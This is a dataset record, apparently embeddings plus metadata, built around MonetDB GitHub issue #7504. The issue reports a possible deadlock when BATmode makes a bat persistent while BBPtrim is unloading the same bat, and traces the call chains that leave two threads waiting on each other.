-0.01633303053677082, -0.0006006518960930407, -0.02370707131922245, -0.006843486335128546, 0.02807239629328251, 0.02745453454554081, 0.005829387344419956, 0.013136269524693489, 0.001294486690312624, 0.0033461893908679485, 0.012189329601824284, 0.0005624553305096924, 0.006410311441868544, 0.002157477894797921, -0.0031598235946148634, 0.006534555461257696, -0.005473445635288954, -0.011517741717398167, -0.008012049831449986, 0.043868158012628555, 0.01484210416674614, 0.02228330448269844, -0.0057219332084059715, -0.0035157655365765095, 0.006897213403135538, -0.0028072395361959934, -0.010731982998549938, 0.009408953599631786, -0.00007135626947274432, 0.008703785948455334, -0.011625195853412151, 0.013042246922850609, 0.004066467750817537, -0.00821352656930685, 0.013794426806271076, -0.003462038468569517, -0.001801535952836275, -0.016897164285182953, -0.013794426806271076, -0.019717836752533913, -0.0027148963417857885, 0.015916645526885986, -0.022941460832953453, 0.007649392355233431, -0.01143715064972639, 0.021275920793414116, -0.020993854850530624, 0.010295450687408447, 0.01402276661247015, 0.025560656562447548, -0.009764895774424076, -0.004398904275149107, -0.0033562632743269205, 0.015876350924372673, -0.004486210644245148, 0.014774945564568043, 0.009623861871659756, 0.013472063466906548, -0.006235698703676462, 0.013653392903506756, 0.015097307972609997, -0.00881795585155487, -0.002921409672126174, 0.03465396165847778, -0.002573862671852112, -0.003411669284105301, 0.0007525988039560616, 0.0036769467405974865, 0.00777027802541852, -0.0008550159982405603, 0.0046205283142626286, -0.025265157222747803, 0.013875016942620277, -0.004281376022845507, 0.005288758780807257, 0.007850868627429008, 0.009301499463617802, 0.003915360663086176, -0.010100689716637135, -0.012646010145545006, -0.011564753018319607, -0.00821352656930685, 0.0008457817020826042, -0.013686972670257092, -0.019207429140806198, 0.0032991780899465084, -0.005792450159788132, -0.015097307972609997, 0.030167752876877785, 0.014909262768924236, 0.0024110025260597467, -0.007219575811177492, 0.01593007706105709, -0.0057857343927025795, -0.02026853896677494, 0.02510397508740425, 0.0034788281191140413, 0.014667491428554058, 0.010067110881209373, -0.00360307190567255, -0.011067776940762997, 0.026379993185400963, -0.010423052124679089, 0.021544557064771652, -0.0033512262161821127, -0.012437817640602589, -0.01331088226288557, 0.005010049790143967, 0.008750797249376774, 0.015513692982494831, 0.010859585367143154, -0.021450534462928772, -0.015070443972945213, 0.02646058425307274, -0.005255179479718208, -0.003737389575690031, -0.012578851543366909, 0.018294068053364754, 0.013028815388679504, -0.0006283549009822309, -0.007783710025250912, -0.025144271552562714, -0.002740080701187253, 0.014506310224533081, 0.001464902306906879, 0.026379993185400963, -0.015124171040952206, -0.01756875403225422, 0.010651392862200737, -0.0038079062942415476, 0.005893188528716564, -0.00613496033474803, 0.003205155720934272, 0.017555322498083115, -0.00009281562233809382, 0.006390164140611887, -0.005036913324147463, 0.0015186293749138713, -0.0014069777680560946, -0.015943508595228195, -0.01666882447898388, 0.024929363280534744, 0.017407571896910667, 0.006024148315191269, -0.006195403169840574, 0.005184662528336048, 0.030946794897317886, -0.004123553168028593, 0.003938866313546896, -0.012041580863296986, -0.004210859537124634, 0.02766944281756878, 0.006823338568210602, 0.0011559715494513512, -0.0042981659062206745, -0.03371373936533928, 0.004788425285369158, 0.009805191308259964, -0.010241723619401455, 0.00130372098647058, 0.029952844604849815, 0.005601047538220882, 0.014506310224533081, 0.007642676122486591, 0.020684923976659775, -0.003399916458874941, -0.00039686678792349994, -0.005362633615732193, -0.009227625094354153, -0.00048186469939537346, 0.00003633398227975704, 0.006689020898193121, 0.012699737213551998, 0.0005511222407221794, 0.003747463459149003, 0.013861585408449173, 0.008341128006577492, -0.016991186887025833, -0.009865634143352509, 0.008092640899121761, 0.02439209260046482, 0.0037810427602380514, 0.007790425792336464, -0.018200047314167023, 0.013552654534578323, 0.006514407694339752, 0.009160466492176056, 0.028341032564640045, -0.003962371964007616, -0.0074344840832054615, 0.0009041259181685746, -0.015795759856700897, -0.017125504091382027, 0.0021809833124279976, 0.005298832897096872, 0.003059085225686431, -0.009583567269146442, 0.006937508471310139, -0.004059751983731985, 0.013149701058864594, 0.01380785834044218, -0.019905881956219673, 0.006783043034374714, 0.02671578712761402, -0.0031799711287021637, -0.008408287540078163, 0.0038381279446184635, 0.021584851667284966, -0.00014491619367618114, -0.012941509485244751, -0.026353130117058754, 0.02612479031085968, -0.006366658490151167, -0.015177898108959198, 0.0017083530547097325, 0.0056480588391423225, -0.01179309282451868, 0.03433160111308098, -0.02330411784350872, -0.002808918710798025, -0.03169897571206093, -0.02783062495291233, 0.013472063466906548 ]
null
null
null
null
null
null
null
null
null
[ "MonetDB", "MonetDB" ]
**Describe the bug** One thread calling bm_commit (store manager applying the WAL) and making a bat persistent (calling BATmode), and another thread unloading the same bat (BBPmanager calling BBPtrim) at the same time may cause deadlock. BATmode has a reference to the heaps (bat_iterator) when it calls BBPretain, which calls incref, which waits until unloading is finished; and BBPtrim calls BBPfree which calls BATfree which waits until the heap reference count goes down. In other words, two threads waiting for each other.
possible deadlock when a bat is made persistent when it is also getting unloaded
https://api.github.com/repos/MonetDB/MonetDB/issues/7504/comments
0
2024-04-29T14:41:20
2024-06-27T13:20:06Z
https://github.com/MonetDB/MonetDB/issues/7504
2,269,231,495
7,504
false
This is a GitHub Issue repo:MonetDB owner:MonetDB Title : possible deadlock when a bat is made persistent when it is also getting unloaded Issue date: --- start body --- **Describe the bug** One thread calling bm_commit (store manager applying the WAL) and making a bat persistent (calling BATmode), and another thread unloading the same bat (BBPmanager calling BBPtrim) at the same time may cause deadlock. BATmode has a reference to the heaps (bat_iterator) when it calls BBPretain, which calls incref, which waits until unloading is finished; and BBPtrim calls BBPfree which calls BATfree which waits until the heap reference count goes down. In other words, two threads waiting for each other. --- end body ---
720
[ -0.02208988554775715, 0.0015961651224642992, -0.020781734958291054, 0.020261447876691818, -0.019146548584103584, 0.03258480876684189, 0.005124823655933142, 0.03817417472600937, -0.021926365792751312, 0.018477609381079674, 0.009766523726284504, 0.01657484658062458, 0.017570823431015015, -0.013334203511476517, -0.00206442316994071, 0.021688520908355713, 0.019101953133940697, 0.011238191276788712, -0.014136931858956814, -0.04260404407978058, 0.018551934510469437, -0.009119881317019463, -0.01651538535952568, 0.03537949174642563, -0.005578216165304184, -0.0029359031468629837, -0.030741509050130844, 0.010368569754064083, -0.029537416994571686, -0.02234259620308876, -0.02919551357626915, 0.03389295935630798, 0.021956097334623337, 0.03897690400481224, -0.01226389966905117, 0.03264427185058594, 0.003939313348382711, 0.006470136344432831, 0.02895766869187355, 0.004652849398553371, -0.02009792998433113, -0.001505114953033626, -0.06044244393706322, 0.01335650123655796, -0.02925497479736805, 0.04180131480097771, -0.03579572215676308, 0.03273346275091171, -0.038084983825683594, 0.02228313311934471, 0.05865860357880592, -0.044952765107154846, -0.023219650611281395, -0.05042320862412453, 0.004953871946781874, -0.033774036914110184, 0.02683192491531372, 0.019934412091970444, -0.0003723301342688501, 0.006098502781242132, -0.026802195236086845, -0.0016128886491060257, 0.003699609776958823, 0.04376354068517685, 0.006198843941092491, -0.006964408326894045, -0.02458726055920124, 0.01954791322350502, -0.016901884227991104, 0.004563657101243734, -0.0000375407726096455, -0.01117129810154438, 0.02809547819197178, -0.0007832171977497637, 0.029909050092101097, 0.00825769267976284, 0.03963097557425499, 0.009357727132737637, 0.0037367730401456356, 0.01538561936467886, -0.03421999514102936, 0.0038575539365410805, -0.03424972668290138, 0.015184937976300716, 0.0011474179336801171, -0.01596536673605442, -0.008138769306242466, -0.06421823799610138, -0.012360524386167526, 0.005500173196196556, -0.015251831151545048, 0.004132562316954136, 0.018715454265475273, -0.02124256081879139, -0.016009964048862457, 0.0031718905083835125, -0.03445784002542496, 0.011646987870335579, -0.027099501341581345, -0.015430215746164322, 0.003000939032062888, -0.030132029205560684, -0.002040266990661621, 0.006154248025268316, 0.01602482795715332, 0.032019928097724915, 0.0007753199897706509, 0.007153941318392754, 0.05434765666723251, 0.1032843291759491, -0.021495271474123, -0.03873905912041664, -0.0366579107940197, 0.006994138937443495, -0.02488456666469574, -0.003305678488686681, 0.03306049853563309, 0.014337613247334957, -0.026757599785923958, 0.020320909097790718, -0.03722279518842697, -0.03567679971456528, -0.030860431492328644, -0.0014214974362403154, 0.014003143645823002, -0.014545728452503681, -0.003166315844282508, -0.020068198442459106, -0.04697445034980774, -0.020543890073895454, -0.020410101860761642, -0.06148301810026169, -0.04079047217965126, -0.024691317230463028, -0.01532615814357996, -0.007064749486744404, 0.02732248231768608, 0.026668407022953033, -0.016678903251886368, -0.006343781016767025, -0.0506313219666481, -0.07182928919792175, 0.030027972534298897, -0.024304818361997604, 0.02720355987548828, 0.004671430680900812, -0.03004283830523491, -0.01846274361014366, -0.01614375226199627, 0.05586392059922218, 0.021138504147529602, 0.006139382254332304, 0.02738194353878498, 0.03297130763530731, -0.004764338955283165, 0.0021610476542264223, -0.009090150706470013, -0.025449449196457863, -0.02458726055920124, 0.026906251907348633, -0.02919551357626915, -0.01286594569683075, 0.0029303287155926228, -0.028853610157966614, -0.02791709452867508, -0.0014447245048359036, 0.00009238572238245979, 0.030741509050130844, -0.01925060525536537, 0.00792322214692831, -0.05408008024096489, -0.0037367730401456356, -0.013765297830104828, 0.0017634001560509205, -0.01742216944694519, 0.01742216944694519, -0.005938700400292873, 0.020112795755267143, -0.00502076605334878, -0.011780776083469391, 0.012137544341385365, -0.015028851106762886, -0.003233209950849414, -0.03142531216144562, 0.029046859592199326, -0.004351826384663582, -0.011052374728024006, 0.022134480997920036, -0.005061645992100239, -0.012100380845367908, 0.016307270154356956, -0.01590590551495552, 0.040760744363069534, -0.009060420095920563, 0.0007386212237179279, 0.003972760401666164, -0.023398034274578094, -0.026058929041028023, 0.02913605235517025, -0.017689745873212814, 0.03011716529726982, -0.04403111711144447, -0.034636225551366806, 0.014114633202552795, -0.01566806063055992, 0.017332978546619415, -0.015489676967263222, 0.02283315174281597, 0.009000958874821663, -0.017095133662223816, 0.0066076405346393585, 0.014367343857884407, -0.0009894737740978599, 0.00358068710193038, -0.03820390626788139, 0.033774036914110184, 0.006254588719457388, -0.0005537336692214012, 0.008428643457591534, -0.009766523726284504, -0.005868090316653252, -0.026073792949318886, -0.02403724379837513, 0.00043202374945394695, -0.02677246369421482, -0.0001415690639987588, -0.004069384653121233, 0.0038687027990818024, -0.007440099027007818, -0.001713229576125741, 0.08134309947490692, 0.02925497479736805, 0.0032517914660274982, 0.009075285866856575, -0.007083331234753132, -0.003484062384814024, -0.017214056104421616, -0.013527452945709229, -0.028140075504779816, -0.02506295032799244, 0.03746064007282257, 0.04504195973277092, -0.039303939789533615, -0.027902230620384216, -0.0072022536769509315, 0.03199019655585289, 0.02100471593439579, 0.00888946931809187, -0.002783533651381731, 0.02665354125201702, 0.022431787103414536, -0.029180647805333138, -0.01942899078130722, -0.047450143843889236, 0.01887897215783596, 0.004013639874756336, 0.02324938029050827, 0.029180647805333138, -0.007480978965759277, 0.007172523066401482, 0.002006819937378168, 0.027872499078512192, -0.0727212056517601, 0.0360632985830307, 0.022595306858420372, -0.023725071921944618, -0.0005370101425796747, 0.025761621072888374, 0.00006248085264815018, 0.0020049617160111666, 0.009052988141775131, -0.039898552000522614, -0.005957282148301601, -0.03368484601378441, 0.00943948607891798, 0.026207581162452698, -0.00989287905395031, 0.01699107512831688, -0.04388246312737465, 0.017273517325520515, 0.0005249320529401302, 0.05164216458797455, 0.025895409286022186, 0.004047086928039789, -0.022104749456048012, 0.02214934676885605, 0.036628179252147675, -0.04218781366944313, -0.04855017736554146, -0.023873724043369293, -0.005407264921814203, -0.015281561762094498, 0.006878932937979698, -0.007291445974260569, 0.04575549438595772, 0.001255191513337195, 0.0065741934813559055, -0.001781052676960826, -0.027352211996912956, -0.03041447140276432, 0.00837661512196064, -0.016901884227991104, -0.01687215268611908, -0.009595572017133236, -0.02165878936648369, 0.004195739980787039, -0.0031477343291044235, 0.02657921425998211, -0.010286809876561165, 0.002369162393733859, 0.014530862681567669, -0.022000692784786224, -0.005637677386403084, -0.021212829276919365, -0.01007126271724701, 0.00828742329031229, -0.0045339264906942844, 0.013653808273375034, -0.026698138564825058, -0.0025809933431446552, -0.013765297830104828, 0.0006842698785476387, -0.044774383306503296, -0.018299223855137825, 0.03844175115227699, -0.02506295032799244, -0.02876441925764084, 0.04970967397093773, -0.03752009943127632, -0.0020978699903935194, -0.0010257079266011715, -0.047747448086738586, -0.029998240992426872, -0.004790353588759899, -0.0431094653904438, -0.03728225454688072, -0.02706977166235447, 0.006841769441962242, 0.013319338671863079, -0.017347844317555428, -0.014122066088020802, 0.011082105338573456, -0.0017866272246465087, -0.0028206969145685434, 0.006165396887809038, 0.010465194471180439, -0.03835256025195122, 0.012694993987679482, 0.03647952526807785, -0.005667407996952534, 0.000793901679571718, 0.037430908530950546, 0.0045041958801448345, 0.01392881665378809, 0.050839439034461975, -0.010115859098732471, -0.009454351849853992, -0.051315128803253174, -0.002413758309558034, 0.03004283830523491, 0.03555787727236748, -0.052474625408649445, 0.022743958979845047, -0.013482856564223766, -0.007677944377064705, 0.011587526649236679, 0.003969043958932161, -0.029121186584234238, -0.0065221646800637245, -0.02318991906940937, -0.017020806670188904, 0.003116145497187972, 0.017332978546619415, -0.046647414565086365, -0.0025828515645116568, 0.005388683173805475, 0.02271422930061817, 0.023026401177048683, 0.02391832135617733, 0.020529024302959442, -0.021777711808681488, -0.01785326562821865, -0.006098502781242132, -0.048104215413331985, 0.006685683503746986, -0.039898552000522614, -0.008488104678690434, 0.009521245956420898, -0.021762847900390625, -0.008488104678690434, 0.0051619866862893105, 0.018715454265475273, -0.04765825718641281, -0.028363054618239403, 0.0030752657912671566, 0.02932930178940296, 0.03793632984161377, -0.010160454548895359, -0.0006986706284806132, 0.005882955621927977, -0.0002316901518497616, -0.07640781253576279, 0.026504889130592346, 0.0432283878326416, -0.02797655574977398, 0.03704440966248512, 0.03891744092106819, 0.0011948011815547943, 0.010621280409395695, -0.013527452945709229, 0.007443815469741821, -0.013951115310192108, -0.024438606575131416, 0.04364461824297905, 0.022075019776821136, -0.014776140451431274, -0.011267921887338161, 0.0003481739549897611, -0.03740117698907852, 0.0009030689834617078, -0.040820203721523285, -0.00397647637873888, -0.02263990230858326, 0.010487492196261883, -0.012583504430949688, -0.022327730432152748, 0.005057929549366236, 0.011847670190036297, 0.0371336005628109, -0.010175320319831371, 0.010108426213264465, -0.010970615781843662, 0.008696219883859158, -0.0028504275251179934, -0.02907659113407135, -0.00938002485781908, 0.0053329383954405785, 0.010502357967197895, 0.00031751420465297997, -0.016842423006892204, -0.00041669385973364115, 0.003305678488686681, -0.0012003756128251553, 0.014374776743352413, 0.0021201681811362505, -0.02354668639600277, -0.040463436394929886, -0.011959160678088665, 0.016307270154356956, -0.03127666190266609, -0.01514777448028326, 0.0255535077303648, -0.0058272103779017925, -0.041295893490314484, -0.0005685989744961262, -0.03430918976664543, -0.011111835949122906, -0.01523696631193161, 0.001771761802956462, 0.04254458099603653, -0.01526669692248106, 0.035468682646751404, 0.024869702756404877, -0.010606414638459682, -0.00347477151080966, 0.019622240215539932, 0.007306311279535294, -0.002437914488837123, 0.018849242478609085, -0.04516088217496872, 0.012605802156031132, 0.007276580203324556, -0.053693581372499466, 0.034933533519506454, 0.006563044618815184, -0.00043179147178307176, -0.00415857695043087, -0.0026757598388940096, 0.008540133945643902, -0.011974025517702103, 0.02980499155819416, -0.026311639696359634, 0.012457149103283882, 0.01783839985728264, -0.01323757879436016, 0.01329704001545906, -0.018254628404974937, -0.017154594883322716, -0.03478487953543663, 0.008361749351024628, -0.01469438150525093, -0.001008055405691266, -0.013371367007493973, -0.006403242237865925, 0.018953299149870872, 0.00003902149910572916, -0.008547566831111908, 0.02732248231768608, 0.026876522228121758, -0.004065668676048517, 0.03222804144024849, -0.08152148872613907, 0.018195167183876038, -0.005830926820635796, 0.05104755237698555, -0.009342861361801624, 0.017704611644148827, 0.03276319429278374, -0.0017197332344949245, -0.034071341156959534, -0.0015961651224642992, -0.0036122759338468313, 0.009848282672464848, -0.015051149763166904, 0.007533007301390171, -0.025835948064923286, 0.04049316793680191, -0.003229493508115411, -0.000013798338841297664, 0.03983909264206886, -0.015214668586850166, -0.03992828354239464, -0.002045841421931982, 0.021272290498018265, 0.007856328040361404, 0.0259102750569582, 0.006596491672098637, 0.003069691127166152, -0.029700934886932373, -0.050661053508520126, -0.005689706187695265, 0.024066973477602005, -0.019072221592068672, 0.02313045784831047, -0.003614134155213833, 0.01614375226199627, -0.00775227090343833, 0.025657564401626587, -0.014939659275114536, 0.008034712634980679, 0.007625915575772524, 0.008473239839076996, 0.012315928004682064, 0.015697792172431946, -0.007518141996115446, -0.0038389721885323524, 0.008101606741547585, 0.01718432456254959, -0.0035007859114557505, -0.015251831151545048, -0.03338753804564476, -0.01083682756870985, -0.020365506410598755, 0.017095133662223816, -0.009394890628755093, -0.0021833458449691534, 0.02659408003091812, 0.0019845219794660807, 0.019280336797237396, -0.010703039355576038, 0.005830926820635796, 0.0007976180058903992, 0.010784799233078957, 0.009090150706470013, -0.015801848843693733, -0.018284359946846962, -0.006020459812134504, 0.0046194023452699184, -0.02289261296391487, -0.0028448530938476324, 0.039303939789533615, 0.033357806503772736, 0.01535588875412941, -0.03636060282588005, -0.01777893863618374, -0.017585689201951027, 0.009476649574935436, -0.016426192596554756, -0.026445427909493446, -0.022446652874350548, 0.02216421067714691, -0.03588491305708885, -0.011104403994977474, 0.0063883769325912, 0.01948845200240612, -0.050839439034461975, -0.021584464237093925, -0.01232336089015007, 0.003835255978628993, -0.004047086928039789, -0.014174094423651695, 0.027961691841483116, 0.026727868244051933, -0.0036438647657632828, 0.033952418714761734, -0.06118571013212204, -0.0011390561703592539, -0.00033841858385130763, 0.030800970271229744, 0.011253057047724724, -0.022431787103414536, 0.013178117573261261, 0.000776713655795902, -0.0051619866862893105, 0.007454964332282543, 0.017585689201951027, -0.018224898725748062, 0.006462703458964825, -0.01844787783920765, 0.018001917749643326, -0.0033186855725944042, -0.008971228264272213, 0.06897514313459396, -0.0009625303209759295, 0.02883874624967575, 0.010576684027910233, 0.00010423153435112908, 0.0022353744134306908, 0.01532615814357996, 0.01010099332779646, 0.06100732460618019, -0.0045227776281535625, -0.007715107873082161, -0.006581625901162624, -0.003218344645574689, 0.04153373837471008, -0.00096531753661111, 0.017407305538654327, 0.02622244693338871, -0.006982990074902773, 0.004734608344733715, 0.03805525228381157, 0.01578698307275772, -0.0364200659096241, 0.006221141666173935, 0.029418494552373886, 0.009967206045985222, -0.046409569680690765, 0.0025271065533161163, -0.01143887359648943, 0.014805871993303299, -0.013393664732575417, -0.004244052339345217, -0.008941497653722763, -0.029834723100066185, -0.011921997182071209, 0.01874518394470215, -0.02451293356716633, 0.014062604866921902, 0.014508564956486225, -0.04866909980773926, 0.006548179313540459, 0.00683062057942152, 0.01565319485962391, 0.01189969852566719, -0.01268756203353405, 0.013096358627080917, 0.020246583968400955, 0.012709859758615494, 0.017645150423049927, -0.03398215025663376, -0.009461784735321999, -0.0366579107940197, -0.026311639696359634, 0.02889820747077465, -0.006250872276723385, -0.003913298714905977, 0.03010229952633381, 0.020127661526203156, 0.003406019415706396, 0.013847057707607746, 0.001037786016240716, 0.017332978546619415, -0.03291184827685356, -0.004805218894034624, -0.0016296120593324304, -0.014196393080055714, 0.017154594883322716, 0.014040307141840458, 0.008681354112923145, 0.006838052999228239, 0.0008477885276079178, -0.004206889308989048, -0.0033038202673196793, -0.00015480849833693355, -0.010197618044912815, -0.012843647971749306, 0.010502357967197895, -0.020231718197464943, -0.042455390095710754, 0.009588140062987804, -0.010591549798846245, 0.02360614947974682, 0.006091070361435413, 0.01126048993319273, 0.014025441370904446, 0.010428030975162983, -0.007124210707843304, -0.015222100540995598, -0.015199802815914154, 0.002423049183562398, 0.01858166605234146, 0.0013741141883656383, 0.02342776395380497, -0.018655993044376373, 0.012962570413947105, -0.0015367037849500775, -0.019027626141905785, 0.024899432435631752, 0.005998161621391773, -0.017749207094311714, -0.014924794435501099, -0.032257772982120514, -0.016619442030787468, -0.008123904466629028, 0.002967491978779435, 0.0025029503740370274, -0.0357065312564373, -0.03053339384496212, 0.00333912530913949, -0.008384048007428646, -0.020380372181534767, 0.022387191653251648, -0.039482325315475464, -0.0006503583281300962, -0.00273150485008955, 0.000653610099107027, 0.014010576531291008, -0.0003725624119397253, 0.013207848183810711, -0.021584464237093925, -0.025389987975358963, 0.03011716529726982, -0.0012802768032997847, -0.0024453471414744854, 0.03873905912041664, -0.013282175175845623, 0.008867170661687851, 0.0038055251352488995, 0.011736180633306503, -0.00786376092582941, 0.044655460864305496, -0.03466595709323883, -0.007031302433460951, 0.01730324700474739, 0.025642698630690575, 0.009253669530153275, 0.023888589814305305, -0.008161067962646484, 0.005321789067238569, 0.04096885770559311, 0.03288211673498154, 0.02750086598098278, -0.016099154949188232, -0.019458720460534096, 0.013274742290377617, -0.014746409840881824, 0.003480345942080021, 0.04697445034980774, -0.0015060440637171268, -0.004652849398553371, -0.01326730940490961, 0.013393664732575417, 0.013059195131063461, 0.055209845304489136, -0.007789434399455786, 0.008242826908826828, -0.050601594150066376, 0.01614375226199627, -0.02385886013507843, -0.007782001979649067, -0.006284319330006838, -0.018135705962777138, 0.010814529843628407, 0.029225245118141174, -0.04783664271235466, -0.019815487787127495, -0.013170684687793255, -0.02446833811700344, 0.01517750509083271, -0.007521858438849449, -0.012538908049464226, -0.014761275611817837, 0.006083637475967407, 0.013520020060241222, -0.020410101860761642, -0.02311559207737446, -0.03216858208179474, 0.024869702756404877, -0.014776140451431274, 0.005083943717181683, 0.011572661809623241, 0.030072567984461784, 0.0045227776281535625, 0.04578522592782974, -0.035230837762355804, -0.005188001319766045, 0.01550454180687666, -0.03472541645169258, -0.05244489386677742, -0.03089016117155552, -0.01797218807041645, -0.03297130763530731, 0.005648826714605093, -0.022684497758746147, -0.013163251802325249, -0.008540133945643902, 0.007406651973724365, -0.01565319485962391, 0.05057186260819435, -0.02433454990386963, 0.02726302109658718, 0.013698404654860497, 0.00206442316994071, 0.022788554430007935, 0.0031941884662956, -0.017674880102276802, -0.0021053028758615255, 0.03065231628715992, 0.060055945068597794, -0.023442629724740982, -0.025285931304097176, 0.014738977886736393, -0.026385966688394547, -0.0259102750569582, -0.003465480636805296, 0.02222367189824581, -0.0044707488268613815, 0.01523696631193161, 0.025152143090963364, 0.022179076448082924, 0.01874518394470215, -0.002460212679579854, -0.00989287905395031, -0.04863936826586723, 0.031038815155625343, 0.003352132625877857, -0.01520723570138216, -0.059639714658260345, 0.01990468055009842, -0.00849553756415844, -0.019577642902731895, 0.004994751885533333, -0.007655646651983261, 0.004024788737297058, -0.01438220962882042, -0.023041265085339546, -0.01547481119632721, -0.025717025622725487, 0.022491248324513435, 0.022669631987810135, 0.010331406258046627, -0.008785411715507507, 0.03710386902093887, -0.035349760204553604, -0.004381556995213032, 0.019711431115865707, 0.016708634793758392, -0.002300410298630595, 0.017674880102276802, 0.04192023724317551, -0.03897690400481224, -0.013653808273375034, -0.02295207418501377, 0.03537949174642563, 0.010309108532965183, 0.01626267470419407, -0.04388246312737465, -0.005017049610614777, -0.00852526817470789, -0.009476649574935436, -0.02271422930061817, 0.009870581328868866, 0.020529024302959442, 0.0024304818361997604, -0.05274220183491707, 0.005548485554754734, 0.01217470783740282, -0.0027519448194652796, 0.009052988141775131, -0.004296081140637398, 0.01577211730182171, -0.07022383064031601, -0.030146894976496696, 0.011684151366353035, -0.014278152026236057, 0.0059424168430268764, -0.012665263377130032, -0.034814611077308655, 0.002789108082652092, -0.010732769966125488, 0.013304472900927067, -0.02732248231768608, -0.028496842831373215, 0.005258611403405666, -0.009996936656534672, 0.00769280968233943, -0.02913605235517025, 0.0037999507039785385, -0.024007512256503105, -0.004790353588759899, -0.01184023730456829, -0.034071341156959534, -0.014686948619782925, 0.0029396195895969868, -0.006956975907087326, 0.026668407022953033, 0.002842994872480631, 0.009848282672464848, 0.008034712634980679, -0.00107680750079453, 0.026415696367621422, -0.013728135265409946, -0.02015739120543003, 0.010561819188296795, 0.009796254336833954, -0.058123450726270676, -0.024988625198602676, -0.030250951647758484, 0.011580094695091248, 0.010086128488183022, 0.01876004971563816, 0.002436056500300765, 0.011104403994977474, 0.020960118621587753, -0.011141566559672356, 0.018864108249545097, 0.007090763654559851, 0.006719130557030439, 0.0013908377150073647, 0.006994138937443495, -0.02956714667379856, 0.011713881976902485, 0.02785763330757618, 0.005659975577145815, 0.005240029655396938, 0.0012988584348931909, -0.013965980149805546, 0.011699017137289047, -0.035349760204553604, -0.03261454030871391, 0.032198309898376465, 0.010123291984200478, -0.0036029850598424673, 0.009045555256307125, 0.019770892336964607, 0.0013332345988601446, -0.02165878936648369, -0.018165437504649162, -0.011602392420172691, -0.0035825453232973814, -0.01038343459367752, -0.028690092265605927, -0.04492303729057312, -0.02246151864528656, 0.02409670501947403, -0.025583237409591675, -0.007306311279535294, -0.02293720841407776, 0.037847138941287994, -0.018611397594213486, 0.02228313311934471, -0.004927857778966427, -0.023948051035404205, -0.0021833458449691534, 0.02726302109658718, -0.029180647805333138, 0.03249561786651611, -0.03873905912041664, -0.002501092152670026, -0.007559021934866905, 0.02222367189824581, -0.009721927344799042, 0.036628179252147675, 0.002127600833773613, 0.01917628012597561, -0.01632213592529297, -0.0036828862503170967, -0.004296081140637398, -0.006667101755738258, 0.034636225551366806, -0.0212574265897274, 0.04189050942659378, -0.015816714614629745, -0.00412884633988142, -0.0035100767854601145, 0.008235394023358822, -0.005600514356046915, -0.0016955770552158356, 0.008138769306242466, 0.0065407464280724525, -0.02094525471329689, 0.024126434698700905, 0.022862881422042847, 0.03193073347210884, -0.0052846260368824005, 0.000057777368056122214, -0.013170684687793255, -0.029596878215670586, -0.004701161291450262, -0.01089628878980875, 0.019815487787127495, 0.02640083059668541, -0.03404161334037781, 0.019830353558063507, 0.001602668664418161, -0.0008998171542771161, 0.022729093208909035, -0.009194208309054375, 0.04096885770559311, 0.00843607634305954, 0.0067228469997644424, 0.006321482826024294, 0.007625915575772524, 0.009171910583972931, 0.00415857695043087, 0.01143887359648943, 0.02457239478826523, 0.020350640639662743, 0.016664037480950356, 0.018893837928771973, 0.015742387622594833, 0.00018906845070887357, -0.03763902187347412, 0.0031867558136582375, 0.012620667926967144, -0.006804605945944786, -0.02014252543449402, 0.025657564401626587, 0.019830353558063507, 0.010651011019945145, 0.002393318573012948, 0.010532088577747345, 0.0014614480314776301, -0.01031654141843319, -0.028571169823408127, 0.01821003295481205, -0.0007781072636134923, -0.023531822487711906, 0.00608735391870141, 0.028080614283680916, -0.002001245506107807, -0.018774915486574173, 0.008629325777292252, -0.0072319842875003815, -0.006663385313004255, -0.008740815334022045, 0.007436382584273815, 0.030132029205560684, 0.006410674657672644, 0.023903455585241318, 0.0052660442888736725, 0.05559634417295456, -0.023323707282543182, 0.023323707282543182, 0.0008129478665068746, -0.03873905912041664, -0.010636145249009132, 0.01960737444460392, 0.002358013531193137, 0.01544508058577776, -0.029938779771327972, -0.008577297441661358, 0.008785411715507507, -0.032257772982120514, -0.018477609381079674, 0.014419373124837875, 0.018284359946846962, -0.006838052999228239, 0.036390334367752075, 0.009900311939418316, -0.008123904466629028, -0.006763726472854614, -0.021941231563687325, -0.032138850539922714, -0.026564350351691246, 0.026817061007022858, -0.009996936656534672, -0.010546953417360783, 0.018715454265475273, -0.0011167580960318446, -0.01986008509993553, 0.000747912039514631, -0.006897514220327139, -0.04837179183959961, -0.009588140062987804, -0.028140075504779816, -0.00490184361115098, -0.008896901272237301, -0.028571169823408127, -0.01856680028140545, 0.013334203511476517, -0.029150918126106262, -0.011282787658274174, -0.0012765604769811034, -0.01335650123655796, 0.030072567984461784, 0.07182928919792175, -0.01426328718662262, -0.014486267231404781, -0.007547872606664896, 0.00004262169750290923, 0.0014791006688028574, 0.0037757945246994495, -0.011111835949122906, 0.019473586231470108, -0.014122066088020802, 0.039363402873277664, -0.00466028181836009, 0.0072654313407838345, 0.00946921668946743, -0.0018832518253475428, 0.003019520780071616, 0.0038203904405236244, -0.0128362150862813, 0.019741162657737732, -0.017764072865247726, 0.009335429407656193, 0.0038835681043565273, 0.021153368055820465, -0.013103790581226349, -0.0034320338163524866, 0.019874950870871544, 0.006986706517636776, -0.026252178475260735, -0.024111570790410042, -0.01566806063055992, -0.022922342643141747, -0.016232943162322044, 0.0021406079176813364, -0.013319338671863079, -0.016470788046717644, 0.005143404938280582, 0.012055785395205021, -0.009565841406583786, -0.015370754525065422, -0.01372070237994194, -0.009736793115735054, -0.008094173856079578, -0.007521858438849449, -0.0036940351128578186, 0.007087047211825848, 0.007767136208713055, 0.0365389883518219, -0.022104749456048012, -0.013408530503511429, 0.006871500052511692, 0.008681354112923145, -0.01911681890487671, 0.0026850507128983736, -0.012620667926967144, 0.0005291129346005619, 0.004095399286597967, 0.004723459482192993, 0.010242214426398277, -0.005552201997488737, 0.014835602603852749, 0.0033186855725944042, -0.007243133615702391, 0.00021496665431186557, 0.01760055497288704, 0.04001747444272041, -0.008123904466629028, 0.001119545428082347, -0.014107201248407364, 0.01821003295481205, 0.007473546080291271, 0.004047086928039789, -0.0018275068141520023, 0.010710472241044044, -0.024498067796230316, 0.03053339384496212, 0.03448757156729698, -0.01815057173371315, 0.01797218807041645, 0.003864986589178443, -0.012182140722870827, -0.010160454548895359, 0.011788208968937397, 0.003864986589178443, 0.00023970349866431206, -0.002707348670810461, 0.021093906834721565, -0.02385886013507843, -0.01095575001090765, 0.0021647640969604254, 0.002460212679579854, 0.00020184334425721318, 0.051761090755462646, -0.014701814390718937, -0.01426328718662262, -0.00035537435906007886, -0.002720355987548828, 0.0004835878498852253, -0.011327384039759636, -0.00442986935377121, 0.00026548554887995124, 